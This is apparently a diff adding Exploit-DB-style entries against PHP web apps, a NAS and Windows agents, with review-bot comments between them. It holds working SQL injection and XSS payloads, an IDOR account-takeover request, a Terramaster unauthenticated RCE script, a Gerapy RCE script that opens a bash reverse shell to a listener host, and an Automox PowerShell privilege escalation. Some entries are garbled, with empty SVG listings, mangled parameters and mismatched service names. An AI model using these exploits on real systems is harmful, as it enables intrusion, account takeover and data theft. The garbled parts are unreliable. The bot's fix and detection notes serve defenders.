+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: https://wiki.nettemp.tk
+# Software Link: https://wiki.nettemp.tk
+# Version: nettmp NNT
+# Tested on: Linux (Ubuntu 20.04)
+
+Payload:
+
+username: 1' or 1=1;--
+password: \
+
+Proof of Concept:
+
+POST /index.php?id=status HTTP/1.1
+Host: vuln.com
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 55
+Origin: http://vuln.com
+DNT: 1
+Connection: close
+Referer: http://vulnIP/index.php?id=status
+Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq
+Upgrade-Insecure-Requests: 1
+
+username=1%27+or+1%3D1%3B--&password=%5C&form_login=log
\ No newline at end of file
diff --git a/exploits/php/webapps/50628.txt b/exploits/php/webapps/50628.txt
new file mode 100644
index 000000000..05ba0256a
--- /dev/null
+++ b/exploits/php/webapps/50628.txt
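Review bot: The product name is spelled three ways — `Nettmp NNT` in the title, `nettemp` in the vendor URLs and `nettmp NNT` on the `# Version:` line, which also carries no version number although the title says 5.1. The `Host: vuln.com` and `Referer: http://vulnIP/...` headers in the PoC request name different hosts, so one of them was edited after capture. Since the bypass works by closing the quoted username and commenting out the remainder of the query, the defensive note worth adding is that the login query must use a prepared statement; filtering `'` from the input alone is not a reliable fix.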
@@ -0,0 +1,15 @@
+# Exploit Title: Hostel Management System 2.1 - Cross Site Scripting (XSS)
+# Date: 26/12/2021
+# Exploit Author: Chinmay Vishwas Divekar
+# Vendor Homepage: https://phpgurukul.com/hostel-management-system/
+# Software Link: https://phpgurukul.com/hostel-management-system/
+# Version: V 2.1
+# Tested on: PopOS_20.10
+
+*Steps to reproduce*
+
+1) Open book-hostel page using following url https://localhost/hostel/book-hostel.php
+2) Enter xss payload on various input fields.
+3) Server Accepted our Payload in input fileds.
+
+Affected input fields: Correspondence Address, Guardian Relation, Permanent Address
\ No newline at end of file
diff --git a/exploits/php/webapps/50630.txt b/exploits/php/webapps/50630.txt
new file mode 100644
index 000000000..f06e10b39
--- /dev/null
+++ b/exploits/php/webapps/50630.txt
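Review bot: The steps never say where the submitted values are rendered back, so it is unclear whether this is stored XSS (shown to staff viewing bookings) or reflected, and `2) Enter xss payload on various input fields` gives no example, so the entry is not independently verifiable. Step 3 has `fileds` for `fields`, and the title lacks the stored/reflected qualifier that the other XSS entries in this commit carry.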
@@ -0,0 +1,22 @@
+# Exploit Title: Hospitalss Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)
+# Date: 30/12/2021
+# Exploit Author: twseptian
+# Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip
+# Version: v1.0
+# Tested on: Kali Linux 2021.4
+
+*SQL Injection*
+SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Hospital's Patient Records Management System v1.0 is vulnerable to SQL injection via the 'id' parameter on the patient list.
+
+*Attack Vector*
+An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.
+
+*Steps to reproduce:*
+Step-1: On the dashboard navigate to 'Patient List', then go to 'Action' > 'View Records' page using the following URL:
+http://localhost/hprms/admin/?page=patients/view_patient&id=1
+
+Step-2: Put the SQL Injection payloads in 'id' field.
+time-based blind payload : page=patients/view_patient&id=1' AND (SELECT 2664 FROM (SELECT(SLEEP(5)))ixec) AND 'XcAY'='XcAY
+
+Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
\ No newline at end of file
diff --git a/exploits/php/webapps/50631.txt b/exploits/php/webapps/50631.txt
new file mode 100644
index 000000000..66adcbce9
--- /dev/null
+++ b/exploits/php/webapps/50631.txt
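Review bot: The title reads `Hospitalss Patient Records Management System` while the body and the companion 50631.txt use `Hospital's`/`Hospitals`; the title is what the index displays, so the typo should be fixed before merge. The time-based payload in Step-2 establishes that `id` is concatenated into the query as a string; a one-line mitigation note (`bind id as an integer parameter`) and a detection hint (`SLEEP(` inside `page=patients/view_patient` query strings, or view_patient responses taking several seconds) would round out the entry for defenders.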
@@ -0,0 +1,122 @@ +# Exploit Title: Hospitals Patient Records Management System 1.0 - Account TakeOver +# Date: 30/12/2021 +# Exploit Author: twseptian +# Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip +# Version: v1.0 +# Tested on: Kali Linux 2021.4 + +*Insecure direct object references (IDOR)* +Insecure Direct Object References (IDOR) occur when an application provides direct access to objects based on user-supplied input.Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system. + +*Attack Vector* +An attacker can takeover the Administrator's account + +*Steps of reproduce:* +Note: in this case, we used two users, user1 as a staff with user id '4', and admin as an Administrator with user id '1'. 
+ +===================================================================================================================================== + +Step-1: Log in to the application using user1 account,then on the dashboard navigate to 'My Account' + +http://localhost/hprms/admin/?page=user + +===================================================================================================================================== + +Step-2: Modify the username,lastname and password,then let's intercept the request using burpsuite: + +POST /hprms/classes/Users.php?f=save HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239 +Content-Length: 806 +Origin: http://localhost +Connection: close +Referer: http://localhost/hprms/admin/?page=user +Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="id" + +4 +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="firstname" + +user1 +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="lastname" + +admin +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="username" + +admin1 +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="password" + +admin1 +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="img"; filename="" +Content-Type: application/octet-stream + + +-----------------------------17632878732301879013646251239-- + 
+===================================================================================================================================== + +Step-3: Change parameter id '4' to id '1' + +POST /hprms/classes/Users.php?f=save HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239 +Content-Length: 806 +Origin: http://localhost +Connection: close +Referer: http://localhost/hprms/admin/?page=user +Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="id" + +1 +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="firstname" + +user1 +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="lastname" + +admin +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="username" + +admin1 +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="password" + +admin1 +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="img"; filename="" +Content-Type: application/octet-stream + + +-----------------------------17632878732301879013646251239-- + +===================================================================================================================================== + +step-4: Click 'Forward' on burpsuite. Now user1 is a Administrator. \ No newline at end of file diff --git a/exploits/php/webapps/50634.txt b/exploits/php/webapps/50634.txt new file mode 100644 index 000000000..e0b076ad3 --- /dev/null +++ b/exploits/php/webapps/50634.txt 
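Review bot: The two captured requests differ only in the `id` field (`4` versus `1`), so the Step-2 capture is redundant and the `Content-Length: 806` carried unchanged into Step-3 is only correct because both ids are a single character; the second block could be reduced to the one changed part. The root cause the text should state is that `classes/Users.php?f=save` trusts the client-supplied `id` instead of the session's user id, and lets a password be set without the current one — the fix is to derive the target row from the session and require re-authentication for credential changes. The same handler name appears in 50621.py; if the two sourcecodester projects share that code, the fix applies to both.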
@@ -0,0 +1,35 @@
+# Exploit Title: Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection
+# Google Dork: Powered by Virtual Airlines Manager [v2.6.2]
+# Date: 2021-12-30
+# Exploit Author: Milad Karimi
+# Vendor Homepage: http://virtualairlinesmanager.net
+# Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/
+# Version: 2.6.2
+# Tested on: Ubuntu 19.04
+
+[1] Vulnerable GET parameter: notam_id=[SQLi]
+[PoC] http://localhost/vam/index.php?page=notam¬am_id=[SQLi]
+
+[2] Vulnerable GET parameter: airport=[SQLi]
+[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi]
+
+[3] Vulnerable GET parameter: registry_id=[SQLi]
+[PoC] http://localhost/vam/index.php?page=plane_info_public®istry_id=[SQLi]
+
+[4] Vulnerable GET parameter: plane_location=[SQLi]
+[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi]
+
+[5] Vulnerable GET parameter: hub_id=[SQLi]
+[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi]
+
+[6] Vulnerable GET parameter: pilot_id=[SQLi]
+[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi]
+
+[7] Vulnerable GET parameter: registry_id=[SQLi]
+[PoC] http://localhost/vam/index.php?page=plane_info_public®istry_id=[SQLi]
+
+[8] Vulnerable GET parameter: event_id=[SQLi]
+[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi]
+
+[9] Vulnerable GET parameter: tour_id=[SQLi]
+[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]
\ No newline at end of file
diff --git a/exploits/php/webapps/50635.py b/exploits/php/webapps/50635.py
new file mode 100755
index 000000000..f41a29d04
--- /dev/null
+++ b/exploits/php/webapps/50635.py
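Review bot: Entry [7] duplicates entry [3] — same `registry_id` parameter and the same `page=plane_info_public` PoC URL — so the file numbers nine findings but documents eight distinct parameters. The PoC URLs for [1], [3] and [7] also read `¬am_id` and `®istry_id`, which as rendered here looks like `&notam_id` / `&registry_id` after HTML-entity decoding of `&not` and `&reg`; the committed text is worth checking against the original advisory. Dropping the duplicate entry and writing every query string with a literal `&` would make the list unambiguous.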
@@ -0,0 +1,113 @@
+# Exploit Title: Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)
+# Date: 12/24/2021
+# Exploit Author: n0tme (thatsn0tmysite)
+# Full Write-Up: https://thatsn0tmy.site/posts/2021/12/how-to-summon-rces/
+# Vendor Homepage: https://www.terra-master.com/
+# Version: TOS 4.2.X (4.2.15-2107141517)
+# Tested on: 4.2.15, 4.2.10
+
+#/bin/env python
+
+import urllib3
+import requests
+import json
+import argparse
+import hashlib
+import time
+import os
+
+TARGET = None
+MAC_ADDRESS = None
+PWD = None
+TIMESTAMP = None
+
+def tos_encrypt_str(toencrypt):
+ key = MAC_ADDRESS[6:]
+ return hashlib.md5(f"{key}{toencrypt}".encode("utf8")).hexdigest()
+
+def user_session(session, username):
+ session.cookies.clear()
+ cookies = {"kod_name":username, "kod_token":tos_encrypt_str(PWD)}
+ if username == "guest":
+ cookies = {"kod_name":"guest", "kod_token":tos_encrypt_str("")}
+
+ for name,value in cookies.items():
+ session.cookies[name] = value
+
+def download(session, path, save_as=None):
+ user_session(session, "guest")
+ r=session.post(f"{TARGET}/module/api.php?mobile/fileDownload", data={"path":path})
+ filename = os.path.basename(path)
+ if save_as is not None:
+ filename = save_as
+ with open(filename, "wb") as file:
+ file.write(r.content)
+
+def get_admin_users(session):
+ download(session, "/etc/group", save_as="/tmp/terramaster_group")
+ with open("/tmp/terramaster_group", "r") as groups:
+ for line in groups:
+ line = line.strip()
+ fields = line.split(':')
+ if fields[0] == "admin":
+ users = fields[3].split(",")
+ os.remove("/tmp/terramaster_group")
+ return users
+
+if __name__ == '__main__':
+ p = argparse.ArgumentParser()
+ p.add_argument(dest="target", help="Target URL (e.g. http://10.0.0.100:8181)")
+ p.add_argument("--cmd", dest="cmd", help="Command to run", default="id")
+ p.add_argument("-d", "--download", dest="download", help="Only download file", default=None)
+ p.add_argument("-o", "--output", dest="save_as", help="Save downloaded file as", default=None)
+ p.add_argument("-c", "--create", dest="create", help="Only create admin user (format should be admin:password)", default=None)
+ p.add_argument("--tor", dest="tor", default=False, action="store_true", help="Use TOR")
+ p.add_argument("--rce", dest="rce", default=0, type=int, help="RCE to use (1 and 2 have no output)")
+ args = p.parse_args()
+ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+ TARGET = args.target
+
+ s = requests.Session()
+ if args.tor:
+ s.proxies = {"http":"socks5://127.0.0.1:9050", "https": "socks5://127.0.0.1:9050"}
+ s.headers.update({"user-device":"TNAS", "user-agent":"TNAS"})
+
+ r=s.post(f"{TARGET}/module/api.php?mobile/wapNasIPS")
+ try:
+ j = r.json()
+ PWD = j["data"]["PWD"]
+ MAC_ADDRESS = j["data"]["ADDR"]
+ except KeyError:
+ exit(1)
+
+ TIMESTAMP = str(int(time.time()))
+ s.headers.update({"signature": tos_encrypt_str(TIMESTAMP), "timestamp": TIMESTAMP})
+ s.headers.update({"authorization": PWD})
+
+ if args.download != None:
+ download(s, args.download, save_as=args.save_as)
+ exit(0)
+
+ #RCEs
+ RCEs=[f"{TARGET}/tos/index.php?app/del&id=0&name=;{args.cmd};xx%23",
+ f"{TARGET}/tos/index.php?app/hand_app&name=;{args.cmd};xx.tpk", #BLIND
+ f"{TARGET}/tos/index.php?app/app_start_stop&id=ups&start=0&name=donotcare.*.oexe;{args.cmd};xx"] #BLIND
+
+ for admin in get_admin_users(s):
+ user_session(s, admin)
+ if args.create != None:
+ user, password = args.create.split(":")
+ groups = json.dumps(["allusers", "admin"])
+ r=s.post(f"{TARGET}/module/api.php?mobile/__construct")
+ r=s.post(f"{TARGET}/module/api.php?mobile/set_user_information", data={"groups":groups, "username":user,"operation":"0","password":password,"capacity":""})
+ if "create user successful!" in str(r.content, "utf8"):
+ print(r.content)
+ break
+ continue
+
+ r = s.get(RCEs[args.rce])
+ content = str(r.content, "utf-8")
+ if "" not in content:
+ print(content)
+ exit(0)
\ No newline at end of file
diff --git a/exploits/php/webapps/50637.txt b/exploits/php/webapps/50637.txt
new file mode 100644
index 000000000..19cf7b0ab
--- /dev/null
+++ b/exploits/php/webapps/50637.txt
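Review bot: `get_admin_users` writes the fetched group file to the fixed path `/tmp/terramaster_group` — a predictable name in a shared, world-writable directory — and only removes it on the branch where a line whose first field is `admin` is found; on any other input the file is left behind and the function falls off the end returning `None`, which the `for admin in get_admin_users(s)` loop in `__main__` does not handle. Parsing `r.content` in memory, or at least using `tempfile.NamedTemporaryFile`, would avoid both the predictable path and the leftover file. From the appliance side, the combination visible here — hard-coded `user-device: TNAS` / `user-agent: TNAS` headers, a `kod_name=guest` cookie on `mobile/fileDownload`, and a `signature` header derived with `hashlib.md5` from the device's own `ADDR` — is a reasonable basis for a detection rule on the device's web logs.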
@@ -0,0 +1,60 @@
+# Exploit Title: openSIS Student Information System 8.0 - 'multiple' SQL Injection
+# Date: 26/12/2021
+# Exploit Author: securityforeveryone.com
+# Author Mail: hello[AT]securityforeveryone.com
+# Vendor Homepage: https://opensis.com
+# Software Link: https://opensis.com
+# Version: 8.0 Community Edition
+# Tested on: Linux/Windows
+# Researchers : Security For Everyone Team - https://securityforeveryone.com
+
+'''
+
+DESCRIPTION
+
+A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v8.0 via the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to /TransferredOutModal.php.
+
+The vulnerability is found in the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to page /TransferredOutModal.php.
+
+Example:
+
+POST /TransferredOutModal.php?modfunc=detail
+
+Post Data: student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5
+
+if an attacker exploits this vulnerability, attacker may access private data in the database system.
+
+EXPLOITATION
+
+POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
+Host: localhost
+User-Agent: user-agent
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: cookie
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 69
+
+student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5
+
+Example sqlmap Command: sqlmap.py -r request.txt --level 5 --risk 3 -p student_id --random-agent --dbs
+
+Example Payloads:
+
+Payload1: student_id=(SELECT (CASE WHEN (2108=2108) THEN 1 ELSE (SELECT 5728 UNION SELECT 5943) END))&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
+Payload2: student_id=1 AND (SELECT 5604 FROM(SELECT COUNT(*),CONCAT(0x7162766a71,(SELECT (ELT(5604=5604,1))),0x717a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
+Payload3: student_id=1 AND (SELECT 6111 FROM (SELECT(SLEEP(5)))JtuC)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
+
+
+ABOUT SECURITY FOR EVERYONE TEAM
+
+We are a team that has been working on cyber security in the industry for a long time.
+
+In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
+
+We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools
+
+'''
\ No newline at end of file
diff --git a/exploits/php/webapps/50641.txt b/exploits/php/webapps/50641.txt
new file mode 100644
index 000000000..049aa6432
--- /dev/null
+++ b/exploits/php/webapps/50641.txt
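Review bot: The DESCRIPTION section names the second parameter `TRANSFER{SCHOOL]` (twice), while the request body and all three example payloads use `TRANSFER[SCHOOL]`; the stray brace makes the description disagree with the reproduction data it introduces. The ABOUT section also spells the domain `securityforeveyone.com`, whereas every other reference in the file is `securityforeveryone.com`.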
@@ -0,0 +1,22 @@
+# Exploit Title: Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)
+# Exploit Author: Oscar Gutierrez (m4xp0w3r)
+# Date: January 4, 2021
+# Vendor Homepage: https://www.projeqtor.org/en/
+# Software Link: https://www.projeqtor.org/en/product-en/downloads
+# Tested on: Ubuntu, LAAMP
+# Vendor: Projeqtor
+# Version: v9.3.1
+
+# Exploit Description:
+Projeqtor version 9.3.1 suffers from a stored XSS vulnerability via SVG file upload. A low level user can upload svg images that contain malicious Javascript. In this way an attacker can escalate privileges and upload a malicious plugin which results in arbitrary code execution in the server hosting the application.
+
+# Steps to reproduce:
+Upload the following XML code as an SVG file and change the xlink for a location that you control. Once the administrator user opens the attachment, the Javascript code hosted by the attacker will execute.
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/50643.txt b/exploits/php/webapps/50643.txt
new file mode 100644
index 000000000..11bef17da
--- /dev/null
+++ b/exploits/php/webapps/50643.txt
@@ -0,0 +1,16 @@
+# Exploit Title: WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
+# Date: 04/01/2022
+# Exploit Author: Andrea Bocchetti
+# Vendor Homepage: https://getaawp.com/
+# Software Link: https://getaawp.com/
+# Version: 3.16
+# Tested on: Windows 10 - Chrome, WordPress 5.8.2
+
+# Proof of Concept:
+# 1- Install and activate AAWP 3.16 plugin.
+# 2- Go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX
+# 3- Add payload to the Tab, the XSS Payload: %22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y
+# 4- XSS has been triggered.
+
+# Go to this url "http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y"
+XSS will trigger.
\ No newline at end of file
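Review bot: In 50641.txt the "Steps to reproduce" paragraph says "Upload the following XML code", but the eight lines that follow are empty, so the file — at least as rendered here — refers to a listing it does not contain; if the markup was lost to an HTML-unaware paste, the text should at minimum say so rather than point at nothing. The header `# Date: January 4, 2021` is also probably a typo for 2022, given the commit date and the `04/01/2022` date on the sibling 50643.txt in the same hunk pair.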
diff --git a/exploits/python/remote/50640.py b/exploits/python/remote/50640.py
new file mode 100755
index 000000000..ab934840a
--- /dev/null
+++ b/exploits/python/remote/50640.py
@@ -0,0 +1,130 @@
+# Exploit Title: Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)
+# Date: 03/01/2022
+# Exploit Author: Jeremiasz Pluta
+# Vendor Homepage: https://github.com/Gerapy/Gerapy
+# Version: All versions of Gerapy prior to 0.9.8
+# CVE: CVE-2021-43857
+# Tested on: Gerapy 0.9.6
+
+# Vulnerability: Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8.
+
+#!/usr/bin/python
+import sys
+import re
+import argparse
+import pyfiglet
+import requests
+import time
+import json
+import subprocess
+
+banner = pyfiglet.figlet_format("CVE-2021-43857")
+print(banner)
+print('Exploit for CVE-2021-43857')
+print('For: Gerapy < 0.9.8')
+
+login = "admin" #CHANGE ME IF NEEDED
+password = "admin" #CHANGE ME IF NEEDED
+
+class Exploit:
+
+ def __init__(self, target_ip, target_port, localhost, localport):
+ self.target_ip = target_ip
+ self.target_port = target_port
+ self.localhost = localhost
+ self.localport = localport
+
+ def exploitation(self):
+ payload = """{"spider":"`/bin/bash -c 'bash -i >& /dev/tcp/""" + localhost + """/""" + localport + """ 0>&1'`"}"""
+
+ #Login to the app (getting auth token)
+ url = "http://" + target_ip + ":" + target_port
+ r = requests.Session()
+ print("[*] Resolving URL...")
+ r1 = r.get(url)
+ time.sleep(3)
+ print("[*] Logging in to application...")
+ r2 = r.post(url + "/api/user/auth", json={"username":login,"password":password}, allow_redirects=True)
+ time.sleep(3)
+ if (r2.status_code == 200):
+ print('[*] Login successful! Proceeding...')
+ else:
+ print('[*] Something went wrong!')
+ quit()
+
+ #Create a header out of auth token (yep, it's bad as it looks)
+ dict = json.loads(r2.text)
+ temp_token = 'Token '
+ temp_token2 = json.dumps(dict['token']).strip('"')
+ auth_token = {}
+ auth_token['Authorization'] = temp_token + temp_token2
+
+ #Get the project list
+ print("[*] Getting the project list")
+ r3 = r.get(url + "/api/project/index", headers=auth_token, allow_redirects=True)
+ time.sleep(3)
+
+ if (r3.status_code != 200):
+ print("[!] Something went wrong! Maybe the token is corrupted?")
+ quit();
+
+ #Parse the project name for a request (yep, it's worse than earlier)
+ dict = r3.text # [{'name': 'test'}]
+ dict2 = json.dumps(dict)
+ dict3 = json.loads(dict2)
+ dict3 = json.loads(dict3)
+ name = dict3[0]['name']
+ print("[*] Found project: " + name)
+
+ #use the id to check the project
+ print("[*] Getting the ID of the project to build the URL")
+ r4 = r.get(url + "/api/project/" + name + "/build", headers=auth_token, allow_redirects=True)
+ time.sleep(3)
+ if (r4.status_code != 200):
+ print("[*] Something went wrong! I can't reach the found project!")
+ quit();
+
+ #format the json to dict
+ dict = r4.text
+ dict2 = json.dumps(dict)
+ dict3 = json.loads(dict2)
+ dict3 = json.loads(dict3)
+ id = dict3['id']
+ print("[*] Found ID of the project: ", id)
+ time.sleep(1)
+
+ #netcat listener
+ print("[*] Setting up a netcat listener")
+ listener = subprocess.Popen(["nc", "-nvlp", self.localport])
+ time.sleep(3)
+
+ #exec the payload
+ print("[*] Executing reverse shell payload")
+ print("[*] Watchout for shell! :)")
+ r5 = r.post(url + "/api/project/" + str(id) + "/parse", data=payload, headers=auth_token, allow_redirects=True)
+ listener.wait()
+
+ if (r5.status_code == 200):
+ print("[*] It worked!")
+ listener.wait()
+ else:
+ print("[!] Something went wrong!")
+ listener.terminate()
+
+def get_args():
+ parser = argparse.ArgumentParser(description='Gerapy < 0.9.8 - Remote Code Execution (RCE) (Authenticated)')
+ parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
+ parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
+ parser.add_argument('-L', '--lh', dest="localhost", required=True, action='store', help='Listening IP')
+ parser.add_argument('-P', '--lp', dest="localport", required=True, action='store', help='Listening port')
+ args = parser.parse_args()
+ return args
+
+args = get_args()
+target_ip = args.url
+target_port = args.target_port
+localhost = args.localhost
+localport = args.localport
+
+exp = Exploit(target_ip, target_port, localhost, localport)
+exp.exploitation()
\ No newline at end of file
diff --git a/exploits/windows/local/50633.txt b/exploits/windows/local/50633.txt
new file mode 100644
index 000000000..f6ec8e962
--- /dev/null
+++ b/exploits/windows/local/50633.txt
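Review bot: `Exploit.exploitation()` never reads the attributes that `__init__` stores — it builds `payload` and `url` from the module-level `localhost`, `localport`, `target_ip` and `target_port`, and only `self.localport` is used, for the `subprocess.Popen` listener — so the class is a wrapper around globals and cannot be instantiated with different values; the body should use `self.target_ip`, `self.target_port`, `self.localhost` and `self.localport` consistently. As a matter of style, the locals `dict` and `id` shadow builtins, `quit();` carries C-style semicolons, `r1` is assigned and never used, and `sys` and `re` are imported but unused.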
@@ -0,0 +1,32 @@
+# Exploit Title: TRIGONE Remote System Monitor 3.61 - Unquoted Service Path
+# Discovery by: Yehia Elghaly
+# Date: 30-12-2021
+# Vendor Homepage: https://www.trigonesoft.com/
+# Software Link: https://www.trigonesoft.com/download/Remote_System_monitor_Server_3.61_x86_Setup.exe
+# Tested Version: 3.61
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 7 x86 - Windows Server 2016 x64
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+TRIGONE Remote System Monitor Server RemoteSystemMonitorService
+C:\Program Files\TRIGONE\Remote System Monitor Server\RemoteSystemMonitorService.exe
+Auto
+
+C:\>sc qc srvInventoryWebServer
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: RemoteSystemMonitorService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\TRIGONE\Remote System Monitor Serv
+er\RemoteSystemMonitorService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : TRIGONE Remote System Monitor Server
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/50642.ps1 b/exploits/windows/local/50642.ps1
new file mode 100644
index 000000000..66ff1b830
--- /dev/null
+++ b/exploits/windows/local/50642.ps1
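Review bot: The `sc qc` step queries `srvInventoryWebServer`, but the output printed under it is for `SERVICE_NAME: RemoteSystemMonitorService`, so the command and its result do not belong together (the service name looks carried over from another advisory). The command line should read `C:\>sc qc RemoteSystemMonitorService`, which is the name the `wmic` output two paragraphs above reports. For defenders, the `BINARY_PATH_NAME` and `SERVICE_START_NAME : LocalSystem` lines already state the exposure: an unquoted path with spaces under `C:\Program Files` run as SYSTEM, which is remediated by quoting the `ImagePath` and confirmed by the same `sc qc` query.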
@@ -0,0 +1,42 @@
+# Exploit Title: Automox Agent 32 - Local Privilege Escalation
+# Date: 13/12/2021
+# Exploit Author: Greg Foss
+# Writeup: https://www.lacework.com/blog/cve-2021-43326/
+# Vendor Homepage: https://www.automox.com/
+# Software Link: https://support.automox.com/help/agents
+# Version: 31, 32, 33
+# Tested on: Windows 10
+# Language: PowerShell
+# CVE: CVE-2021-43326
+
+New-Item -ItemType Directory -Force -Path $HOME\Desktop\automox\
+$payload = "whoami >> $HOME\Desktop\automox\who.txt"
+echo ""
+echo "Watching for Automox agent interaction..."
+echo ""
+for (($i = 0); $i -lt 500; $i++) {
+ if (Test-Path -Path \ProgramData\amagent\execDir*\*.ps1) {
+ try {
+ $dir = Get-ChildItem \ProgramData\amagent\execDir* | Select-Object Name
+ $dir = $dir.name
+ $file = Get-ChildItem \ProgramData\amagent\$dir\*.ps1 | Select-Object Name
+ $file = $file.name
+ (Get-Content -Path \ProgramData\amagent\$dir\$file -Raw) -replace "#endregion", "$payload" | Set-Content -Path \ProgramData\amagent\$dir\$file
+ cp -r \ProgramData\amagent\$dir $HOME\Desktop\automox\
+ echo 'popped :-)'
+ Start-Sleep 5
+ echo ''
+ echo 'cloning all powershell script content...'
+ for (($i = 0); $i -lt 100; $i++) {
+ cp -r \ProgramData\amagent\* $HOME\Desktop\automox\ -Force
+ Start-Sleep 1
+ }
+ exit
+ } catch {
+ throw $_.Exception.Message
+ }
+ } else {
+ echo $i
+ Start-Sleep 1
+ }
+}
\ No newline at end of file
diff --git a/exploits/windows/remote/50638.txt b/exploits/windows/remote/50638.txt
new file mode 100644
index 000000000..78f04514d
--- /dev/null
+++ b/exploits/windows/remote/50638.txt
